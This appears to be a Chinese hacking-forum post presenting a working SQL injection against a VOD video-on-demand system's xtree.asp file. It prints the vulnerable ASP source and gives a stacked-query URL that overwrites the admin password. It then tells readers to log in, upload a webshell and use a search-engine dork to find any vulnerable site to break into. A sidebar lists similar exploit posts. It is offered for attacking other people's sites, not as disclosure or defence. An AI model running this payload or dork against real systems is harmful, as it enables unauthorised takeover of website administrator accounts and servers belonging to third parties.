玩了有段时间了 嘎嘎。。。。
漏洞文件webmedia/common/function/xtree.asp
| 以下是引用片段: <!--#include file="../dbcon.inc.asp" --> <% iNode_ID = Request.QueryString("id") if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID else szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID end if rsData.Open szSQL,con,1,3 szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>" do while not rsData.EOF szRetVar = szRetVar & "<TypeInfo>" szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>" szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>" szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>" szRetVar = szRetVar & "</TypeInfo>" rsData.MoveNext loop szRetVar = szRetVar & "</Root>" rsData.Close Response.CharSet = "GB2312" Response.C Response.Expires = -1 Response.Write szRetVar %> 〈!--#include file="../dbend.inc.asp" --> 〈!--#include file="../dbcon.inc.asp" --> 〈% iNode_ID = Request.QueryString("id") if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID else szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID end if rsData.Open szSQL,con,1,3 szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>" do while not rsData.EOF szRetVar = szRetVar & "<TypeInfo>" szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>" szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>" szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>" szRetVar = szRetVar & "</TypeInfo>" rsData.MoveNext loop szRetVar = szRetVar & "</Root>" rsData.Close Response.CharSet = "GB2312" Response.C Response.Expires = -1 Response.Write szRetVar %> <!--#include file="../dbend.inc.asp" --> |
很容易看出以上存在着DB权限注入
注射地址http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1
表段名:customer
构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'
登陆后台 直接上传大马 完事!
测试方法:在google baidu搜: inurL:webmedia/ 随便找个站都可以入侵
官方地址http://www.viewgood.com/
| 入侵远古VOD 0day | 10-05 | |
| Discuz!6.0.0注入漏洞 | 09-27 | |
| 动网8.0最新远程注入漏洞来了 | 09-22 | |
| 利用最近热门的Xss漏洞能做什么? | 09-10 | |
| Dz0724补丁补掉的一个xss+补掉的 | 09-04 | |
| 浪人下载和浪人文章的漏洞利用 | 09-01 | |
| XSS跨站脚本及SQL注入漏洞技术分 | 08-27 | |
| 风讯注入0day | 08-25 | |
| 动易2006_SP6最新漏洞得到管理员 | 08-20 | |
| Dvbbs8严重漏洞 | 08-11 | |
| oblog商业版本4.6注射漏洞,直接 | 08-11 | |
| dvbbs8.0 access 后台拿webshell | 08-11 | |